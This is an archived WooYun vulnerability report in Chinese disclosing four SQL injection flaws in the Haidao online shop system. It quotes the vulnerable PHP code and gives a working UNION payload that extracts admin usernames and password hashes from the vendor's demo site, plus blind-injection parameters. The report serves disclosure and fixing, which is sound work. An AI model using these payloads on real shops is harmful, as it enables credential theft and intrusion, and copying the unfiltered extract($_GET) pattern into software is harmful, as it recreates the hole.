当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140025

漏洞标题:Haidao网店系统 最新版 4处sql注入打包

相关厂商:www.haidao.la

漏洞作者: 路人甲

提交时间:2015-09-10 14:43

修复时间:2015-12-10 12:42

公开时间:2015-12-10 12:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

v1.12.3.150828
注入打包。官网demo测试

详细说明:

#1
/www/appliaction/Controller/User/OrderController.class.php

public function detail() {
		extract($_GET);
		$rs = $this->getInfo($order_sn);
		if(!$rs) {
			showmessage($this->errMsg);
		}
		$delivery = $rs['_delivery'];
		$_config = $this->_config[$rs['pay_type']];
		$tracks = model('order_track')->fetch_all_by_order_sn($order_sn);
		$SEO = seo(0, '订单详情');
		include template('order_detail');
	}


extract($_GET) 后 getInfo($order_sn)
跟到 getInfo

private function getInfo($order_sn = '') {
		if(empty($order_sn)) {
			$this->errMsg = '参数错误';
			return FALSE;
		}
		$sqlmap = array();
		$sqlmap['user_id'] = $this->userid;
		$sqlmap['order_sn'] = $order_sn;
		$rs = $this->db->where($sqlmap)->find();


没有过滤带入了查询。
官网测试下
http://demo.haidao.la/index.php?m=user&c=Order&a=detail
post:

order_sn[0]=%3d1) UNION /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,(/*!50000select*/name%0a/*!50000from*/hd_admin_user limit 1),(/*!50000select*/password%0a/*!50000from*/hd_admin_user limit 1),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%23in


h1.jpg


#2
/appliaction/Controller/Goods/CartController.class.php

public function update() {
        extract($_GET);
        $result = $this->Cart->updateItem($timestamp, $num);
        if(!$result) {
            showmessage('购物车更新失败');
        } else {
            showmessage('购物车更新成功', U('index'), 1);
        }
    }
public function updateItem($timestamp, $num) {
    	if(empty($timestamp)) return FALSE;
    	$num = $num;
    	if ($this->uid) {
            $sqlmap = array();
            $sqlmap['user_id'] = $this->uid;
            $sqlmap['key'] = $timestamp;
            if($num > 0) {
            
            	$this->cart_db->where($sqlmap)->setField('num', $num);
            } else {
            	$this->cart_db->where($sqlmap)->delete();
            }
    	} else {
    		$all_item = json_decode(cookie('Cart'), TRUE);
    		if (!$all_item || !$all_item[$timestamp]) return FALSE;
            if($num > 0) {
            	list($goods_id, $product_id, $number) = str2arr($all_item[$timestamp]);
            	$all_item[$timestamp] = $goods_id.','.$product_id.','.$num;
            	cookie('Cart', json_encode($all_item));
            } else {
            	unset($all_item[$timestamp]);
            }    		
    	}
        $this->getAll();
    	return TRUE;
    }


盲注。
http://localhost:801/index.php?m=Goods&c=cart&a=update
post:
timestamp[0]=xxxxxin&num=1

h1.png


#3
/appliaction/Controller/User/OrderController.class.php

public function comment() {
		extract($_GET);
		$rs = $this->getInfo($order_sn);
......


http://demo.haidao.la/index.php?m=user&c=Order&a=comment
post: order_sn 参数
也是个盲注
#4
/appliaction/Controller/User/OrderReturnController.class.php

public function order_return() {
		extract($_GET);
		$order_info = $this->getInfo($order_sn);...
private function getInfo($order_sn = '') {
		if(empty($order_sn)) {
			$this->errMsg = '参数错误';
			return FALSE;
		}
		$sqlmap = array();
		$sqlmap['user_id'] = $this->userid;
		$sqlmap['order_sn'] = $order_sn;
		$rs = $this->order_db->where($sqlmap)->find();...


http://localhost:801/index.php?m=user&c=OrderReturn&a=order_return
order_sn参数。 同上。
盲注的测试脚本 见http://**.**.**.**/bugs/wooyun-2015-0136380 改下就好了。

漏洞证明:

h1.jpg


h1.png

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-11 12:41

厂商回复:

感谢对海盗云商的关注,我们会尽快修复!

最新状态:

暂无